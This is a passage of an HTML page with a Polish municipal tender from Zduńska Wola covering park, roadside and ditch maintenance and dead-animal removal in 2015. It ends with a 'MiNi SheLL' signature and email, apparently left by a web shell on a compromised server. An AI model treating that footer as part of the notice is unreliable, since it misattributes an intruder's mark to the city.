3. prace porządkowe różne: naprawa ławek, miejsc na ogniska (stoły; ławy) zbieranie papierów, zbieranie  skoszonej przez Koło wędkarskie trzciny z wywozem (w terminie uzgodnionym                           z zamawiającym)
4. opróżnianie koszy  na odpady  1 raz w tygodniu, opróżnianie beczek na odpady  po uzgodnieniu ze zleceniodawcą - 2 razy w miesiącu w okresie od kwietnia do listopada. 
5. sprzątanie palenisk (w/g potrzeb), 
6. mechaniczne usuwanie przerostów ze schodów kamiennych stanowiących umocnienie skarpy zbiornika, ( 2 razy w sezonie) 
7. bieżące  oczyszczanie wlotu i wylotu wody z Kępiny.

Zamawiający wymaga aby:

1.  Jeden raz w tygodniu  wykonawca dokonywał kontrole poprzez oględziny elementów siłowni
  zlokalizowanej przy ul. Okrzei 2a, odnotowując spostrzeżenia w protokole kontroli zgodnie
      z załącznikiem; 
2. w pracach pielęgnacyjnych drzewostanu parkowego brały udział osoby posiadając przeszkolenia 
      z  zakresu pielęgnacji drzew ozdobnych;
3.    materiały niezbędne  do realizacji zamówienia takie jak  paliki, taśmy, nawozy, woda, opryski, piasek,
       kwiaty, znicze, stroisz, farby, deski  itp. należy wliczyć w cenę zamówienia;
4. ubytki po oczyszczeniu oraz rany powstałe po cięciach należy zabezpieczyć preparatem 
      o właściwościach chroniących przed infekcją grzybów patogenicznych, - przyśpieszających gojenie się ran.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 77.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.99</li>
<li>2. Termin płatności - 0.01</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Obejmuje utrzymanie zieleni oraz sprzątanie pasów drogowych dróg gminnych  na trenie  miasta Zduńska Wola.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie IIA
Wymagany standard określający utrzymanie zieleni oraz sprzątanie pasów drogowych dróg gminnych:
1) estetyczny wygląd pasów drogowych, zgodny z przepisami porządkowymi i sanitarnymi;
2) utrzymywanie prawidłowego stanu zieleni zgodnie z zasadami sztuki ogrodniczej, warunkami                    agrotechnicznych oraz warunkami pogodowymi;
3) bezpieczny stan ciągów pieszych i  ścieżek rowerowych w warunkach zimowych.
Szczegółowy wykaz prac w zakresie utrzymania zieleni oraz  sprzątania  pasów drogowych dróg gminnych:
1.Omiatanie powierzchni utwardzonych (chodniki, place, zatoki postojowe, ścieżki rowerowe, opaski)                   - w zależności od potrzeby.
2.Odśnieżane ciągów pieszych, ścieżek rowerowych, przeciwdziałanie i likwidacja śliskości  poprzez                   posypywanie materiałem uszorstniającym (mieszanka piasku i soli 4%) w zależności od warunków                        atmosferycznych, nie później niż dwie godziny od zakończenia opadów, usuwanie błota pośniegowego                   - w zależności od potrzeby.
3. Prace porządkowe (powierzchnie utwardzone i nieutwardzone) - zbieranie zanieczyszczeń (papierów, szkła, niedopałków papierosowych, połamanych gałęzi, rozrzucanie kretowin w okresie bez-śniegowym)                - min. 2 razy na tydzień w okresie od kwietnia do listopada. Zbieranie zanieczyszczeń w pozostałym okresie trwania umowy w zależności od potrzeb.
4. Koszenie zieleńcy, trawników wraz z zebraniem zanieczyszczeń i wywozem - trzy razy w okresie                       od kwietnia do listopada (termin koszenia uzgodniony z zamawiającym).
5. Przycinanie i odchwaszczanie żywopłotów (wraz z wywozem zanieczyszczeń) - dwa razy w okresie                  od kwietnia do listopada (termin wykonania prac uzgodniony z zamawiającym).
6. Pielęgnacja krzewów i rabat: odchwaszczanie (wraz z wywozem zanieczyszczeń), przycinanie,                zasilanie - dwa razy w okresie trwania umowy, podlewanie w okresach suszy.
7. Ułożenie okrywy zabezpieczającej przed przemarzaniem roślin posadzonych w danym sezonie wegetacyjnym (jeśli wystąpią nasadzenia).
8. Usuwanie przerostów (chemiczne i mechaniczne) z powierzchni utwardzonych.
9. Jesienne wygrabianie i sprzątanie liści (wraz z wywozem) z powierzchni utwardzonych (ciągi piesze, place, zatoki postojowe, ścieżki rowerowe, opaski) oraz nieutwardzonych (trawniki, zieleńce) - nie rzadziej niż jeden raz w tygodniu.
10. Jednokrotne malowanie ławek w okresie wiosennym, bieżące mycie zabrudzonych i naprawa                  zniszczonych elementów (uzupełnianie brakujących desek).
11.Ukwiecenia (w terminach ustalonych z zamawiającym) oraz bieżąca pielęgnacja kwietników                     i gazonów (uzupełnianie roślin, zasilanie nawozami - 3 razy w sezonie wegetacyjnym, podlewanie                         na bieżąco):
* wymagana forma nasadzeń dla kwietnika typu 120x120 - 6 pierścieni o konstrukcji metalowej
1 sadzenie: bratki - 50 szt. obsadzanych w systemie 1, 2, 4, 6 warstwa (gazon-1 szt) + kwietniki betonowe  (3 szt. prostokątne + 2 misy śr. 135 cm) na jeden kwietnik 30 szt.

2 sadzenie:
- sadzonki roślin pnących typu: surfinia, pelargonia - obsadzane w systemie wszystkich  warstw                         (gazon - 1szt.) - 65 szt.
kwietniki - sadzonki roślin typu: szałwia, aksamitka, begonia, starzec (kwietniki  betonowe - 5 szt) - 25 szt. na jeden kwietnik.
12. Przyozdobienie kwietników igliwiem świerkowo-sosnowym na okres jesienno-zimowy.
13. Odpady powstałe przy wykonywaniu prac związanych z przedmiotem zamówienia stają się własnością Wykonawcy
 i powinny być unieszkodliwione zgodnie z Ustawą o odpadach (Dz. U. 2013 poz. 21 ze zmianami).
Zadanie IIB - Dodatkowe czynności w zakresie utrzymania zieleni oraz  sprzątania pasów drogowych dróg gminnych. Szczegółowy zakres wykonywanych robót będzie każdorazowo określany w dyspozycji upoważnionego pracownika Zamawiającego w zleceniu jednostkowym.
Zadanie IIC - Inne dodatkowe czynności, które występują lub mogą wystąpić, w zakresie utrzymania zieleni oraz sprzątania pasów drogowych dróg gminnych rozliczane będą w oparciu  o stawki jednostkowe zgodnie z tabelą.
Szczegółowy zakres wykonywanych robót będzie każdorazowo określany w dyspozycji upoważnionego       pracownika Zamawiającego w zleceniu jednostkowym.
Dodatkowe  czynności rozliczane będą w oparciu o nakłady norm rzeczowych, określone w katalogach branżowych oraz kalkulacje własne uprzednio zatwierdzone przez Zamawiającego, obowiązujące w chwili ustalania wysokości wynagrodzenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.66.00.00-6, 77.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.99</li>
<li>2. Termin płatności - 0.01</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Obejmuje utrzymanie terenów miejskich należących do miasta Zduńska Wola poza terenami (takimi jak parki, skwery, place zabaw i pasy dróg)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymagane roboty na działkach miejskich należących do miasta Zduńska Wola w okresie trwania umowy.

1. Wymienione działki miejskie z tabeli nr 1 - koszenie wraz z zebraniem śmieci i wywozem zanieczyszczeń trzy razy od kwietnia do listopada (po uprzednim uzgodnieniu terminu koszenia 
z Zamawiającym).
2. Pielęgnacja żywopłotów występujących na działkach miejskich, polegających na dwukrotnym przycięciu wraz z wywozem powstałego odpadu, a w przypadku wystąpienia szkodników bądź chorób, minimum dwukrotnym oprysku w okresie trwania umowy (po uprzednim uzgodnieniu 
z Zamawiającym).
3. W okresie jesiennym wygrabianie liści wraz z wywozem do trzech razy na działkach 
z uwagą dotyczącą grabienia liści (tak, nie lub częściowo tak), po uprzednim uzgodnieniu terminu grabienia z Zamawiającym.
4. Wymienione działki miejskie z tabeli  nr 2- koszenie wraz z zebraniem śmieci i wywozem zanieczyszczeń dwa razy od kwietnia do listopada (po uprzednim uzgodnieniu terminu koszenia 
z Zamawiającym).
5. Chodniki, miejsca utwardzone i parkingi z tabel nr 1 i 2 należy utrzymać w estetycznym wyglądzie zgodnym z zasadami przepisów porządkowych i sanitarnych, oraz zapewnić bezpieczny stan ciągów pieszych podczas występowania różnych warunków atmosferycznych przez co rozumie się: (omiatanie, odchwaszczanie mechaniczne lub chemiczne, usuwanie przerostów, usuwanie liści 
i zanieczyszczeń, a w okresie opadów śniegu i niezwłocznie po jego ustaniu do dwóch godzin - odgarnięcie śniegu oraz zapobieganie śliskości chodników przez posypywanie mieszanką piasku 
i soli 4%).
6. Obsługa i utrzymanie ławek i koszy znajdujących się na terenach miejskich w tym (opróżnianie koszy wraz z wywozem zanieczyszczeń trzy razy w tygodniu), malowanie raz w roku, oraz przeprowadzenie na własny koszt drobnych napraw eksploatacyjnych związanych  z właściwym utrzymaniem stanu technicznego (w ławkach wymiana uszkodzonych desek wraz z ich pomalowaniem ). 
7. Zbieranie zanieczyszczeń raz w tygodniu (papiery, butelki, foliówki itp.) z działek miejskich wymienionych w tabeli nr 1 wraz z ich wywozem.
8. Działki do uporządkowania z tabeli nr 1 i nr 2, zaznaczone znakiem* - wyrównanie terenu.
9. Na targowisku miejskim przy ul Adama Mickiewicza w okresie zimy Wykonawca zobowiązany jest do usunięcia sopli, nawisów i osuwisk śniegu z zadaszeń w celu umożliwienia prowadzenia działalności handlowej (wywóz śniegu wg potrzeb w miejsce wskazane przez Zamawiającego).
10. Płyta targowiska, ciągi piesze, parking i droga dojazdowa od str. ul. Adama Mickiewicza w okresie zimy mają być utrzymane w stopniu gwarantującym bezpieczne poruszanie się, oraz umożliwienie prowadzenia działalności handlowej. 
11. Niezwłoczne odśnieżanie w okresie opadów śniegu lądowiska i drogi dojazdowej dla Śmigłowców Ratownictwa Medycznego na terenie PPSP przy ul. Długiej 6, (po zgłoszeniu telefonicznym przez dyżurnego PPSP) o pow. 1600 m2. lądowisko plus droga dojazdowa - 50 m x 3 m = 150 m2.  1600+150 =1750 m2. 
12. Odpady powstałe przy wykonywaniu prac związanych z przedmiotem zamówienia stają się własnością Wykonawcy i powinny być unieszkodliwione zgodnie z Ustawą o odpadach (Dz. U. 2013 poz. 21 ze zmianami).
Trzykrotne koszenie działek miejskich z tabeli nr 1 o pow. : 176 897 m2 x 3 = 530 691 m2.
Dwukrotne koszenie działek miejskich z tabeli nr 2 o pow. : 129 743 m2 x 2 = 259 486 m2.
Utrzymanie w należytym porządku  (omiatanie, odśnieżanie, zapobieganie śliskości itp.) chodników, placów utwardzonych i parkingów niezależnie od pory roku z tabel nr 1 i 2 o łącznej pow. 47 634 m2.
Zadanie III B 
Dodatkowe  czynności, które występują bądź mogą wystąpić do  wykonania na zlecenie Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 77.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.99</li>
<li>2. Termin płatności - 0.01</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonanie czynności związanych z bieżącym utrzymaniem i oczyszczaniem ok. 24090 mb rowów melioracyjnych, będących własnością miasta Zduńska Wola..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przez bieżące utrzymanie i oczyszczaniem rowów rozumie się:
utrzymanie drożności rowu;
utrzymanie drożności przepustu.

Wymagane roboty związane z bieżącym utrzymaniem i oczyszczaniem rowów
Wykaszanie, wygrabienie i wywóz traw porastających dno i skarpy rowu     (o szerokości 0,4m - 2,0m) oraz wycinka wraz z wywozem zakrzewień i podrostów drzew (usuwanie samosiejek), których wiek nie przekracza 10 lat.
Usuwanie naniesionego namułu (na głębokość H=0,4m) i wyrównanie dna rowu
	Prace związane z realizacją przedmiotu zamówienia będą każdorazowo zlecane z 7 dniowym wyprzedzeniem w okresie od stycznia do grudnia 2015 r.       
W zleceniu zostanie określona: dokładna lokalizacja miejsca oraz zakres przewidzianych do realizacji robót.
Odpady powstałe przy wykonywaniu prac związanych z przedmiotem zamówienia stają się własnością Wykonawcy i powinny być unieszkodliwione zgodnie z Ustawą o odpadach (Dz. U. 2013 poz. 21 ze zmianami)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.64.00.00-5, 77.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.99</li>
<li>2. Termin płatności - 0.01</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Obejmuje interwencyjne usuwanie martwych zwierząt z pasa drogowego dróg gminnych i z terenów miasta Zduńska Wola..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usuwanie martwych zwierząt i ich szczątków z terenu całego Miasta Zduńska Wola z wyłączeniem, cmentarzy, prywatnych posesji i terenów będących poza władaniem Miasta Zduńska Wola. Przedmiot zamówienia obejmuje m.in. załadunek martwych zwierząt i ich szczątków na środek transportu oraz transport martwych zwierząt i ich szczątków do zakładu utylizacji odpadów, zgodnie z obowiązującymi przepisami sanitarnymi i posiadanymi zezwoleniami bądź do firmy zajmującej się utylizacją tego typu odpadów lub do innych uprawnionych podmiotów. 
2. Wykonanie usługi następować będzie na podstawie zgłoszenia telefonicznego przez Zamawiającego lub Straż Miejską w nieprzekraczalnym czasie 6 godzin od zgłoszenia. Zgłoszenia będą dokonywane w godzinach 7:00  - 22:00. Wykonawca jest zobowiązany przyjmować zgłoszenia w ww. godzinach.   
3. Wykonawca w trakcie wykonywania umowy musi posiadać aktualną decyzją Powiatowego Lekarza Weterynarii zatwierdzającą prowadzoną działalność w zakresie zbierania, transportu i usuwania ubocznych produktów pochodzenia zwierzęcego, a tym samym nadany weterynaryjny numer identyfikacyjny (zgodnie z ustawą z dnia 11 marca 2004 r. o ochronie zdrowia zwierząt oraz zwalczaniu chorób zakaźnych zwierząt (Dz. U. 2008 r. nr 213, poz. 1342)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.66.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.99</li>
<li>2. Termin płatności - 0.01</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com